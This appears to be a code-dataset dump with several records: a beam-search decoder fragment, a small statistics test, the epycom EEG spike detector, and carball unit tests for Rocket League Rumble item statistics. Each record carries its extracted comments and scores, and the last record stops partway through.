is_finished = self.enforce_max_length(is_finished)
is_top_beam_finished = is_finished[:, 0].eq(1)
# Save the finished searches
if is_finished.any():
predictions = self.growing_beam.view(
-1, self.beam_size, self.growing_beam.size(1)
)
for i in range(is_finished.size(0)):
if is_top_beam_finished[i]:
is_finished[i].fill_(1)
finished_hyp = is_finished[i].nonzero().view(-1)
# Store finished hypotheses for this batch.
b = self.batch_offset[i]
for j in finished_hyp:
self.hypotheses[b].append((topk_scores[i, j], predictions[i, j, :]))
# If the batch reached the end, save the best hypotheses
# in terms of length-penalized score.
if is_top_beam_finished[i]:
best_hyp = sorted(
self.hypotheses[b], key=lambda x: x[0], reverse=True
)
best_score, best_prediction = best_hyp[0]
self.results["scores"][b].append(best_score)
self.results["predictions"][b].append(best_prediction)
non_finished = is_top_beam_finished.eq(0).nonzero().view(-1)
if len(non_finished) == 0:
self.is_done = True
# Remove finished batches for the next step.
topk_log_probabilities = topk_log_probabilities.index_select(
0, non_finished
)
self.batch_offset = self.batch_offset.index_select(0, non_finished)
self.growing_beam = predictions.index_select(0, non_finished).view(
-1, self.growing_beam.size(-1)
)
# surviving_beams_rows = surviving_beams_rows.index_select(0, non_finished)
return surviving_beams_rows
def tile(self, x, i):
x = x.unsqueeze(0).repeat(i, *[1 for _ in range(len(x.shape))])
x = x.view(-1, *x.shape[2:]).contiguous()
return x
def forward(self, batch, **kwargs):
# forward pass on the encoder
features, features_merged, keywords, G = self.model.prepare_group(batch)
# grow the beam by generating sequences in an autoregressive way
self.start_token_id = self.model.tokenizer.cls_id
sample_feature = features_merged[list(features.keys())[0]]
device = sample_feature.device
self.batch_size = sample_feature.shape[0]
B = self.batch_size
self.init_states(B, device)
self.growing_beam = torch.full(
(B * self.beam_size, 1), self.start_token_id, dtype=torch.long
).to(device)
for k, v in features_merged.items():
features_merged[k] = self.tile(v, self.beam_size)
keywords = self.tile(keywords, self.beam_size)
for step in range(self.max_length):
decoder_input = self.growing_beam
logit, _, _ = self.model.run_token(
decoder_input,
features_merged, keywords)
logit = logit[:, -1]
log_probabilities = torch.nn.functional.log_softmax(logit, dim=-1)
surviving_beams_rows = self.step(log_probabilities)
if self.is_done:
break
for k, v in features_merged.items():
features_merged[k] = v.index_select(0, surviving_beams_rows)
keywords = keywords.index_select(0, surviving_beams_rows)
hypo = self.results['predictions']
hypo = [self.remove_after_sep(h[0][1:]) for h in hypo] # remove sos, eos
hypo = list(chunks(hypo, 5))
return hypo
def remove_after_sep(self, x):
idx = (x == self.tokenizer.sep_id).nonzero()
if idx.nelement() > 0:
idx = idx[0].item()
return x[:idx + 1]
else:
return x
def remove_repeating_trigrams(self, log_probabilities, _B):
if(self._step + 1 > 3):
for i in range(_B * self.beam_size):
tokens = [t for t in self.growing_beam[i]]
trigrams = [(tokens[i - 1], tokens[i], tokens[i + 1]) for i in range(1, len(tokens) - 1)]
if len(trigrams) > 0:
last_trigram = tuple(trigrams[-1])
if last_trigram in trigrams[:-1]:
log_probabilities[i] = -1e20
return log_probabilities
def enforce_min_length(self, log_probabilities):
if self._step < self.min_length:
log_probabilities[:, self.end_token_id] = -1e20
return log_probabilities
def enforce_max_length(self, is_finished):
if self._step + 1 == self.max_length:
is_finished.fill_(1)
return is_finished
def length_penalty(self):
return ((5.0 + (self._step + 1)) / 6.0) ** self.alpha
def tile(x, count, dim=0):
"""
Tiles `x` along dimension `dim` `count` times.
Example:
>> ex = torch.tensor([1,2],[3,4])
>> tile(ex, 2, 0)
torch.Tensor([[1,2],[1,2],[3,4],[3,4]])
"""
perm = list(range(len(x.size())))
if dim != 0:
perm[0], perm[dim] = perm[dim], perm[0]
x = x.permute(perm).contiguous()
out_size = list(x.size())
out_size[0] *= count
batch = x.size(0)
x = (
x.view(batch, -1)
.transpose(0, 1)
.repeat(count, 1)
.transpose(0, 1)
.contiguous()
.view(*out_size)
)
if dim != 0:
x = x.permute(perm).contiguous()
return x | en | 0.803281 | # coding=utf-8 # Copyright (c) 2019 <NAME> # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. A general wrapper around models with LM heads to generate sequences
using beam search. Attributes:
mask_word_id: token id that corresponds to the mask # State of the beam Grows the beam by one step. # The batch size changes as some beams finish so we define _B # Multiply each beam probability with the probability of the # next token (conditioned on the words in the beam). # Find the `beam_size` (previous_beam + token) combinations with # the highest score # Apply the length penalty. The +1 accounts for the [EOS] token # that will be added if the beam ends. # Retrieve the corresponding respective beam and token id # topk_token_ids[i] will be added to topk_beam_ids[i] # Retrieve the row index of the surviving beams in the original # view of the log_probabilities tensor # Append the last predictions # Check if any of the beam searches has ended during this # growth step. Also if top beam (most probable) has ended # for one element of the batch. # Save the finished searches # Store finished hypotheses for this batch. # If the batch reached the end, save the best hypotheses # in terms of length-penalized score. # Remove finished batches for the next step. # surviving_beams_rows = surviving_beams_rows.index_select(0, non_finished) # forward pass on the encoder # grow the beam by generating sequences in an autoregressive way # remove sos, eos Tiles `x` along dimension `dim` `count` times.
Example:
>> ex = torch.tensor([1,2],[3,4])
>> tile(ex, 2, 0)
torch.Tensor([[1,2],[1,2],[3,4],[3,4]]) | 1.770099 | 2 |
Statistics/test.py | Dheer08/Algorithms | 0 | 6616678 | <filename>Statistics/test.py
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import math
t = math.sqrt(2)
print(t) | <filename>Statistics/test.py
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import math
t = math.sqrt(2)
print(t) | none | 1 | 2.395909 | 2 | |
epycom/event_detection/spike/barkmeier_detector.py | ICRC-BME/epycom | 0 | 6616679 | <reponame>ICRC-BME/epycom
# -*- coding: utf-8 -*-
# Copyright (c) St. Anne's University Hospital in Brno. International Clinical
# Research Center, Biomedical Engineering. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# Std imports
# Third pary imports
import numpy as np
from scipy.signal import butter, filtfilt, find_peaks
# Local imports
from ...utils.method import Method
def detect_spikes_barkmeier(sig, fs=5000, scale=70, std_coeff=4,
through_search=0.05,
det_thresholds={'LS': 700,
'RS': 700,
'TAMP': 600,
'LD': 0.01,
'RD': 0.01},
filter_spec={'narrow': [20, 50],
'broad': [1, 80]},
win_idx=None):
"""
Python version of Barkmeier's EEG spike detector. {Barkmeier et al. 2011}
Parameters
----------
sig: np.ndarray
1D numpy array of EEG data
fs: int
sampling frequency of the signal
scale: float\
scaling parameter (def=70)
std_coeff: float
z-score threshold for spike detection (def=4)
through_search: float
extent to which search for spike throughs in s (def=0.04)
det_thresholds: dict
detection thresholds (dictionary)
{'LS':700, # Left slope
'RS':700, # Right slope
'TAMP':600, # Total amplitude
'LD':0.01, # Left duration
'RD':0.01} # Right duration
filter_spec: dict
narrow and broad band filter specifications
{'narrow':[20, 50],
'broad':[1, 80]}
win_idx: int
Statistical window index. This is used when the
function is run in separate windows. Default = None
Returns
-------
output: list
List of tuples with the following structure of detections:
(event_peak, event_amp, left_amp, left_dur, right_amp, right_dur)
"""
# Create filter coeficients
bh1, ah1 = butter(2, filter_spec['narrow'][0] / (fs / 2), 'highpass')
bl1, al1 = butter(4, filter_spec['narrow'][1] / (fs / 2), 'lowpass')
bh2, ah2 = butter(2, filter_spec['broad'][0] / (fs / 2), 'highpass')
bl2, al2 = butter(4, filter_spec['broad'][1] / (fs / 2), 'lowpass')
output = []
last_idx = -0.005 * fs
# Filter data
fx_narrow = filtfilt(bh1, ah1, sig)
fx_narrow = filtfilt(bl1, al1, fx_narrow)
fx_broad = filtfilt(bh2, ah2, sig)
fx_broad = filtfilt(bl2, al2, fx_broad)
# Scale the data
scale_factor = scale / np.median(np.mean(np.abs(fx_broad)))
fx_broad *= scale_factor
thresh = np.mean(np.abs(fx_narrow)) + std_coeff * np.std(np.abs(fx_narrow))
peak_idxs = np.where(fx_narrow > thresh)[0]
peaks = fx_narrow[peak_idxs]
pis = peak_idxs[find_peaks(peaks)[0]] # Getting the maxima
# Run through peaks and calculate slopes and threshold them
for pi in pis:
# Get correct spike index and voltage
l_idx = int(pi - fs * 0.002)
r_idx = int(pi + fs * 0.002)
if l_idx < 0:
l_idx = 0
if r_idx > len(sig):
r_idx = len(sig)
spike_i = np.argmax(fx_broad[l_idx:r_idx])
spike_i += l_idx
spike_V = fx_broad[spike_i]
# Get the left trough index and voltage
l_idx = spike_i - int(fs * through_search)
if l_idx < 0:
l_idx = 0
if spike_i == l_idx:
continue
left_i = np.argmin(fx_broad[l_idx:spike_i])
left_i += l_idx
left_V = fx_broad[left_i]
# Get the right through index and voltage
r_idx = spike_i + int(fs * through_search)
if r_idx < 0:
r_idx = len(sig)
if spike_i == r_idx:
continue
right_i = np.argmin(fx_broad[spike_i:r_idx])
right_i += spike_i
right_V = fx_broad[right_i]
# Get amp, dur and slope of the left halfwave
l_amp = spike_V - left_V
l_dur = (spike_i - left_i) / fs
l_slope = l_amp / l_dur
# Get amp, dur and slope of the right halfwave
r_amp = spike_V - right_V
r_dur = (right_i - spike_i) / fs
r_slope = r_amp / r_dur
# Threshold
if (((l_slope > det_thresholds['LS'] and
r_slope > det_thresholds['RS'] and
l_amp + r_amp > det_thresholds['TAMP'] and
l_dur > det_thresholds['LD'] and
r_dur > det_thresholds['RD'])
or
(l_slope < det_thresholds['LS'] and
r_slope < det_thresholds['RS'] and
l_amp + r_amp < det_thresholds['TAMP'] and
l_dur > det_thresholds['LD'] and
r_dur > det_thresholds['RD']))
and spike_i - last_idx > 0.005):
if win_idx is not None:
output.append((int(spike_i), spike_V,
l_amp, l_dur,
r_amp, r_dur,
win_idx))
else:
output.append((int(spike_i), spike_V,
l_amp, l_dur,
r_amp, r_dur))
last_idx = spike_i
return output
class BarkmeierDetector(Method):
algorithm = 'BARKMEIER_DETECTOR'
algorithm_type = 'event'
version = '1.0.0'
dtype = [('event_peak', 'int32'),
('event_amp', 'float32'),
('left_amp', 'float32'),
('left_dur', 'float32'),
('right_amp', 'float32'),
('right_dur', 'float32')]
def __init__(self, **kwargs):
"""
Python version of Barkmeier's EEG spike detector.
{Barkmeier et al. 2011}
Parameters
----------
fs: int
sampling frequency of the signal
scale: float\
scaling parameter (def=70)
std_coef: float
z-score threshold for spike detection (def=4)
through_search: float
extent to which search for spike throughs in s (def=0.04)
det_thresholds: dict
detection thresholds (dictionary)
{'LS':700, # Left slope
'RS':700, # Right slope
'TAMP':600, # Total amplitude
'LD':0.01, # Left duration
'RD':0.01} # Right duration
filter_spec: dict
narrow and broad band filter specifications
{'narrow':[20, 50],
'broad':[1, 80]}
sample_offset: int
Offset which is added to the final detection. This is used when the
function is run in separate windows. Default = 0
"""
super().__init__(detect_spikes_barkmeier, **kwargs)
| # -*- coding: utf-8 -*-
# Copyright (c) St. Anne's University Hospital in Brno. International Clinical
# Research Center, Biomedical Engineering. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# Std imports
# Third pary imports
import numpy as np
from scipy.signal import butter, filtfilt, find_peaks
# Local imports
from ...utils.method import Method
def detect_spikes_barkmeier(sig, fs=5000, scale=70, std_coeff=4,
through_search=0.05,
det_thresholds={'LS': 700,
'RS': 700,
'TAMP': 600,
'LD': 0.01,
'RD': 0.01},
filter_spec={'narrow': [20, 50],
'broad': [1, 80]},
win_idx=None):
"""
Python version of Barkmeier's EEG spike detector. {Barkmeier et al. 2011}
Parameters
----------
sig: np.ndarray
1D numpy array of EEG data
fs: int
sampling frequency of the signal
scale: float\
scaling parameter (def=70)
std_coeff: float
z-score threshold for spike detection (def=4)
through_search: float
extent to which search for spike throughs in s (def=0.04)
det_thresholds: dict
detection thresholds (dictionary)
{'LS':700, # Left slope
'RS':700, # Right slope
'TAMP':600, # Total amplitude
'LD':0.01, # Left duration
'RD':0.01} # Right duration
filter_spec: dict
narrow and broad band filter specifications
{'narrow':[20, 50],
'broad':[1, 80]}
win_idx: int
Statistical window index. This is used when the
function is run in separate windows. Default = None
Returns
-------
output: list
List of tuples with the following structure of detections:
(event_peak, event_amp, left_amp, left_dur, right_amp, right_dur)
"""
# Create filter coeficients
bh1, ah1 = butter(2, filter_spec['narrow'][0] / (fs / 2), 'highpass')
bl1, al1 = butter(4, filter_spec['narrow'][1] / (fs / 2), 'lowpass')
bh2, ah2 = butter(2, filter_spec['broad'][0] / (fs / 2), 'highpass')
bl2, al2 = butter(4, filter_spec['broad'][1] / (fs / 2), 'lowpass')
output = []
last_idx = -0.005 * fs
# Filter data
fx_narrow = filtfilt(bh1, ah1, sig)
fx_narrow = filtfilt(bl1, al1, fx_narrow)
fx_broad = filtfilt(bh2, ah2, sig)
fx_broad = filtfilt(bl2, al2, fx_broad)
# Scale the data
scale_factor = scale / np.median(np.mean(np.abs(fx_broad)))
fx_broad *= scale_factor
thresh = np.mean(np.abs(fx_narrow)) + std_coeff * np.std(np.abs(fx_narrow))
peak_idxs = np.where(fx_narrow > thresh)[0]
peaks = fx_narrow[peak_idxs]
pis = peak_idxs[find_peaks(peaks)[0]] # Getting the maxima
# Run through peaks and calculate slopes and threshold them
for pi in pis:
# Get correct spike index and voltage
l_idx = int(pi - fs * 0.002)
r_idx = int(pi + fs * 0.002)
if l_idx < 0:
l_idx = 0
if r_idx > len(sig):
r_idx = len(sig)
spike_i = np.argmax(fx_broad[l_idx:r_idx])
spike_i += l_idx
spike_V = fx_broad[spike_i]
# Get the left trough index and voltage
l_idx = spike_i - int(fs * through_search)
if l_idx < 0:
l_idx = 0
if spike_i == l_idx:
continue
left_i = np.argmin(fx_broad[l_idx:spike_i])
left_i += l_idx
left_V = fx_broad[left_i]
# Get the right through index and voltage
r_idx = spike_i + int(fs * through_search)
if r_idx < 0:
r_idx = len(sig)
if spike_i == r_idx:
continue
right_i = np.argmin(fx_broad[spike_i:r_idx])
right_i += spike_i
right_V = fx_broad[right_i]
# Get amp, dur and slope of the left halfwave
l_amp = spike_V - left_V
l_dur = (spike_i - left_i) / fs
l_slope = l_amp / l_dur
# Get amp, dur and slope of the right halfwave
r_amp = spike_V - right_V
r_dur = (right_i - spike_i) / fs
r_slope = r_amp / r_dur
# Threshold
if (((l_slope > det_thresholds['LS'] and
r_slope > det_thresholds['RS'] and
l_amp + r_amp > det_thresholds['TAMP'] and
l_dur > det_thresholds['LD'] and
r_dur > det_thresholds['RD'])
or
(l_slope < det_thresholds['LS'] and
r_slope < det_thresholds['RS'] and
l_amp + r_amp < det_thresholds['TAMP'] and
l_dur > det_thresholds['LD'] and
r_dur > det_thresholds['RD']))
and spike_i - last_idx > 0.005):
if win_idx is not None:
output.append((int(spike_i), spike_V,
l_amp, l_dur,
r_amp, r_dur,
win_idx))
else:
output.append((int(spike_i), spike_V,
l_amp, l_dur,
r_amp, r_dur))
last_idx = spike_i
return output
class BarkmeierDetector(Method):
algorithm = 'BARKMEIER_DETECTOR'
algorithm_type = 'event'
version = '1.0.0'
dtype = [('event_peak', 'int32'),
('event_amp', 'float32'),
('left_amp', 'float32'),
('left_dur', 'float32'),
('right_amp', 'float32'),
('right_dur', 'float32')]
def __init__(self, **kwargs):
"""
Python version of Barkmeier's EEG spike detector.
{Barkmeier et al. 2011}
Parameters
----------
fs: int
sampling frequency of the signal
scale: float\
scaling parameter (def=70)
std_coef: float
z-score threshold for spike detection (def=4)
through_search: float
extent to which search for spike throughs in s (def=0.04)
det_thresholds: dict
detection thresholds (dictionary)
{'LS':700, # Left slope
'RS':700, # Right slope
'TAMP':600, # Total amplitude
'LD':0.01, # Left duration
'RD':0.01} # Right duration
filter_spec: dict
narrow and broad band filter specifications
{'narrow':[20, 50],
'broad':[1, 80]}
sample_offset: int
Offset which is added to the final detection. This is used when the
function is run in separate windows. Default = 0
"""
super().__init__(detect_spikes_barkmeier, **kwargs) | en | 0.750862 | # -*- coding: utf-8 -*- # Copyright (c) St. Anne's University Hospital in Brno. International Clinical # Research Center, Biomedical Engineering. All Rights Reserved. # Distributed under the (new) BSD License. See LICENSE.txt for more info. # Std imports # Third pary imports # Local imports Python version of Barkmeier's EEG spike detector. {Barkmeier et al. 2011} Parameters ---------- sig: np.ndarray 1D numpy array of EEG data fs: int sampling frequency of the signal scale: float\ scaling parameter (def=70) std_coeff: float z-score threshold for spike detection (def=4) through_search: float extent to which search for spike throughs in s (def=0.04) det_thresholds: dict detection thresholds (dictionary) {'LS':700, # Left slope 'RS':700, # Right slope 'TAMP':600, # Total amplitude 'LD':0.01, # Left duration 'RD':0.01} # Right duration filter_spec: dict narrow and broad band filter specifications {'narrow':[20, 50], 'broad':[1, 80]} win_idx: int Statistical window index. This is used when the function is run in separate windows. Default = None Returns ------- output: list List of tuples with the following structure of detections: (event_peak, event_amp, left_amp, left_dur, right_amp, right_dur) # Create filter coeficients # Filter data # Scale the data # Getting the maxima # Run through peaks and calculate slopes and threshold them # Get correct spike index and voltage # Get the left trough index and voltage # Get the right through index and voltage # Get amp, dur and slope of the left halfwave # Get amp, dur and slope of the right halfwave # Threshold Python version of Barkmeier's EEG spike detector. {Barkmeier et al. 2011} Parameters ---------- fs: int sampling frequency of the signal scale: float\ scaling parameter (def=70) std_coef: float z-score threshold for spike detection (def=4) through_search: float extent to which search for spike throughs in s (def=0.04) det_thresholds: dict detection thresholds (dictionary) {'LS':700, # Left slope 'RS':700, # Right slope 'TAMP':600, # Total amplitude 'LD':0.01, # Left duration 'RD':0.01} # Right duration filter_spec: dict narrow and broad band filter specifications {'narrow':[20, 50], 'broad':[1, 80]} sample_offset: int Offset which is added to the final detection. This is used when the function is run in separate windows. Default = 0 | 2.544571 | 3 |
carball/tests/stats/rumble_test.py | ZachM10/maybe | 0 | 6616680 | <filename>carball/tests/stats/rumble_test.py
import unittest
from carball.analysis.analysis_manager import AnalysisManager
from carball.tests.utils import run_analysis_test_on_replay, get_raw_replays
from carball.generated.api.stats.extra_mode_stats_pb2 import *
class RumbleTest(unittest.TestCase):
def test_pre_item_goals(self):
def test(analysis: AnalysisManager):
proto_game = analysis.get_protobuf_data()
self.assertTrue(proto_game.game_metadata.goals[0].extra_mode_info.pre_items)
self.assertFalse(proto_game.game_metadata.goals[1].extra_mode_info.pre_items)
self.assertTrue(proto_game.game_metadata.goals[2].extra_mode_info.pre_items)
run_analysis_test_on_replay(test, get_raw_replays()["RUMBLE_PRE_ITEM_GOALS"])
def test_item_goals(self):
def test(analysis: AnalysisManager):
proto_game = analysis.get_protobuf_data()
goals = proto_game.game_metadata.goals
for i in range(5):
self.assertTrue(goals[i].extra_mode_info.scored_with_item)
self.assertEqual(goals[0].extra_mode_info.used_item, GRAVITY_WELL)
self.assertEqual(goals[1].extra_mode_info.used_item, BALL_GRAPPLING_HOOK)
self.assertEqual(goals[2].extra_mode_info.used_item, STRONG_HIT)
self.assertEqual(goals[3].extra_mode_info.used_item, BALL_VELCRO)
self.assertEqual(goals[4].extra_mode_info.used_item, BALL_LASSO)
self.assertFalse(goals[5].extra_mode_info.scored_with_item)
run_analysis_test_on_replay(test, get_raw_replays()["RUMBLE_ITEM_GOALS"])
def test_freeze_vs_spike(self):
def test(analysis: AnalysisManager):
proto_game = analysis.get_protobuf_data()
self.assertNotEqual(proto_game.game_stats.rumble_items[1].frame_number_use, -1)
freeze_stats = next(filter(lambda x: x.item == BALL_FREEZE,
proto_game.players[0].stats.rumble_stats.rumble_items))
self.assertEqual(freeze_stats.used, 1)
run_analysis_test_on_replay(test, get_raw_replays()["RUMBLE_FREEZE_VS_SPIKE"])
def test_hold_time(self):
def test(analysis: AnalysisManager):
proto_game = analysis.get_protobuf_data()
spike_stats = next(filter(lambda x: x.item == BALL_VELCRO,
proto_game.players[0].stats.rumble_stats.rumble_items))
self.assertAlmostEqual(spike_stats.average_hold, 11.87916, 5)
spike_stats = next(filter(lambda x: x.item == BALL_VELCRO,
proto_game.teams[0].stats.rumble_stats.rumble_items))
self.assertAlmostEqual(spike_stats.average_hold, 11.87916, 5)
run_analysis_test_on_replay(test, get_raw_replays()["RUMBLE_HOLD_TIME"])
def test_item_count(self):
def test(analysis: AnalysisManager):
proto_game = analysis.get_protobuf_data()
self.assert_rumble_item_counts(proto_game.players[0].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 1, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 1, 'unused': 0},
{'item': BALL_LASSO, 'used': 1, 'unused': 0},
{'item': BALL_SPRING, 'used': 2, 'unused': 0},
{'item': BALL_VELCRO, 'used': 0, 'unused': 1},
{'item': BOOST_OVERRIDE, 'used': 2, 'unused': 0},
{'item': CAR_SPRING, 'used': 1, 'unused': 1},
{'item': GRAVITY_WELL, 'used': 2, 'unused': 0},
{'item': STRONG_HIT, 'used': 2, 'unused': 0},
{'item': SWAPPER, 'used': 1, 'unused': 0},
{'item': TORNADO, 'used': 0, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.players[1].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 2, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 1, 'unused': 1},
{'item': BALL_LASSO, 'used': 1, 'unused': 0},
{'item': BALL_SPRING, 'used': 1, 'unused': 0},
{'item': BALL_VELCRO, 'used': 0, 'unused': 1},
{'item': BOOST_OVERRIDE, 'used': 2, 'unused': 0},
{'item': CAR_SPRING, 'used': 0, 'unused': 1},
{'item': GRAVITY_WELL, 'used': 2, 'unused': 0},
{'item': STRONG_HIT, 'used': 1, 'unused': 0},
{'item': SWAPPER, 'used': 2, 'unused': 0},
{'item': TORNADO, 'used': 0, 'unused': 1}
])
self.assert_rumble_item_counts(proto_game.players[2].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 1, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 0, 'unused': 0},
{'item': BALL_LASSO, 'used': 2, 'unused': 0},
{'item': BALL_SPRING, 'used': 1, 'unused': 0},
{'item': BALL_VELCRO, 'used': 1, 'unused': 1},
{'item': BOOST_OVERRIDE, 'used': 1, 'unused': 1},
{'item': CAR_SPRING, 'used': 0, 'unused': 0},
{'item': GRAVITY_WELL, 'used': 2, 'unused': 0},
{'item': STRONG_HIT, 'used': 2, 'unused': 0},
{'item': SWAPPER, 'used': 1, 'unused': 1},
{'item': TORNADO, 'used': 1, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.players[3].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 0, 'unused': 1},
{'item': BALL_GRAPPLING_HOOK, 'used': 1, 'unused': 1},
{'item': BALL_LASSO, 'used': 1, 'unused': 0},
{'item': BALL_SPRING, 'used': 1, 'unused': 0},
{'item': BALL_VELCRO, 'used': 1, 'unused': 0},
{'item': BOOST_OVERRIDE, 'used': 2, 'unused': 0},
{'item': CAR_SPRING, 'used': 2, 'unused': 0},
{'item': GRAVITY_WELL, 'used': 1, 'unused': 0},
{'item': STRONG_HIT, 'used': 1, 'unused': 0},
{'item': SWAPPER, 'used': 2, 'unused': 0},
{'item': TORNADO, 'used': 0, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.players[4].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 2, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 2, 'unused': 0},
{'item': BALL_LASSO, 'used': 2, 'unused': 0},
{'item': BALL_SPRING, 'used': 0, 'unused': 0},
{'item': BALL_VELCRO, 'used': 1, 'unused': 0},
{'item': BOOST_OVERRIDE, 'used': 2, 'unused': 0},
{'item': CAR_SPRING, 'used': 1, 'unused': 0},
{'item': GRAVITY_WELL, 'used': 2, 'unused': 0},
{'item': STRONG_HIT, 'used': 1, 'unused': 0},
{'item': SWAPPER, 'used': 1, 'unused': 1},
{'item': TORNADO, 'used': 0, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.players[5].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 2, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 2, 'unused': 0},
{'item': BALL_LASSO, 'used': 2, 'unused': 0},
{'item': BALL_SPRING, 'used': 1, 'unused': 0},
{'item': BALL_VELCRO, 'used': 1, 'unused': 0},
{'item': BOOST_OVERRIDE, 'used': 1, 'unused': 0},
{'item': CAR_SPRING, 'used': 2, 'unused': 0},
{'item': GRAVITY_WELL, 'used': 0, 'unused': 0},
{'item': STRONG_HIT, 'used': 2, 'unused': 0},
{'item': SWAPPER, 'used': 1, 'unused': 1},
{'item': TORNADO, 'used': 1, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.teams[0].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 2, 'unused': 1},
{'item': BALL_GRAPPLING_HOOK, 'used': 2, 'unused': 1},
{'item': BALL_LASSO, 'used': 4, 'unused': 0},
{'item': BALL_SPRING, 'used': 4, 'unused': 0},
{'item': BALL_VELCRO, 'used': 2, 'unused': 2},
{'item': BOOST_OVERRIDE, 'used': 5, 'unused': 1},
{'item': CAR_SPRING, 'used': 3, 'unused': 1},
{'item': GRAVITY_WELL, 'used': 5, 'unused': 0},
{'item': STRONG_HIT, 'used': 5, 'unused': 0},
{'item': SWAPPER, 'used': 4, 'unused': 1},
{'item': TORNADO, 'used': 1, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.teams[1].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 6, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 5, 'unused': 1},
{'item': BALL_LASSO, 'used': 5, 'unused': 0},
{'item': BALL_SPRING, 'used': 2, 'unused': 0},
{'item': BALL_VELCRO, 'used': 2, 'unused': 1},
{'item': BOOST_OVERRIDE, 'used': 5, 'unused': 0},
{'item': CAR_SPRING, 'used': 3, 'unused': 1},
{'item': GRAVITY_WELL, 'used': 4, 'unused': 0},
{'item': STRONG_HIT, 'used': 4, 'unused': 0},
{'item': SWAPPER, 'used': 4, 'unused': 2},
{'item': TORNADO, 'used': 1, 'unused': 1}
])
run_analysis_test_on_replay(test, get_raw_replays()["RUMBLE_FULL"])
def assert_rumble_item_counts(self, rumble_stats_proto, expected):
result_stats = list(map(proto_to_dict, rumble_stats_proto.rumble_items))
self.assertCountEqual(result_stats, expected)
def proto_to_dict(item_proto):
return {
'item': item_proto.item,
'used': item_proto.used,
'unused': item_proto.unused
}
| <filename>carball/tests/stats/rumble_test.py
import unittest
from carball.analysis.analysis_manager import AnalysisManager
from carball.tests.utils import run_analysis_test_on_replay, get_raw_replays
from carball.generated.api.stats.extra_mode_stats_pb2 import *
class RumbleTest(unittest.TestCase):
def test_pre_item_goals(self):
def test(analysis: AnalysisManager):
proto_game = analysis.get_protobuf_data()
self.assertTrue(proto_game.game_metadata.goals[0].extra_mode_info.pre_items)
self.assertFalse(proto_game.game_metadata.goals[1].extra_mode_info.pre_items)
self.assertTrue(proto_game.game_metadata.goals[2].extra_mode_info.pre_items)
run_analysis_test_on_replay(test, get_raw_replays()["RUMBLE_PRE_ITEM_GOALS"])
def test_item_goals(self):
def test(analysis: AnalysisManager):
proto_game = analysis.get_protobuf_data()
goals = proto_game.game_metadata.goals
for i in range(5):
self.assertTrue(goals[i].extra_mode_info.scored_with_item)
self.assertEqual(goals[0].extra_mode_info.used_item, GRAVITY_WELL)
self.assertEqual(goals[1].extra_mode_info.used_item, BALL_GRAPPLING_HOOK)
self.assertEqual(goals[2].extra_mode_info.used_item, STRONG_HIT)
self.assertEqual(goals[3].extra_mode_info.used_item, BALL_VELCRO)
self.assertEqual(goals[4].extra_mode_info.used_item, BALL_LASSO)
self.assertFalse(goals[5].extra_mode_info.scored_with_item)
run_analysis_test_on_replay(test, get_raw_replays()["RUMBLE_ITEM_GOALS"])
def test_freeze_vs_spike(self):
def test(analysis: AnalysisManager):
proto_game = analysis.get_protobuf_data()
self.assertNotEqual(proto_game.game_stats.rumble_items[1].frame_number_use, -1)
freeze_stats = next(filter(lambda x: x.item == BALL_FREEZE,
proto_game.players[0].stats.rumble_stats.rumble_items))
self.assertEqual(freeze_stats.used, 1)
run_analysis_test_on_replay(test, get_raw_replays()["RUMBLE_FREEZE_VS_SPIKE"])
def test_hold_time(self):
def test(analysis: AnalysisManager):
proto_game = analysis.get_protobuf_data()
spike_stats = next(filter(lambda x: x.item == BALL_VELCRO,
proto_game.players[0].stats.rumble_stats.rumble_items))
self.assertAlmostEqual(spike_stats.average_hold, 11.87916, 5)
spike_stats = next(filter(lambda x: x.item == BALL_VELCRO,
proto_game.teams[0].stats.rumble_stats.rumble_items))
self.assertAlmostEqual(spike_stats.average_hold, 11.87916, 5)
run_analysis_test_on_replay(test, get_raw_replays()["RUMBLE_HOLD_TIME"])
def test_item_count(self):
def test(analysis: AnalysisManager):
proto_game = analysis.get_protobuf_data()
self.assert_rumble_item_counts(proto_game.players[0].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 1, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 1, 'unused': 0},
{'item': BALL_LASSO, 'used': 1, 'unused': 0},
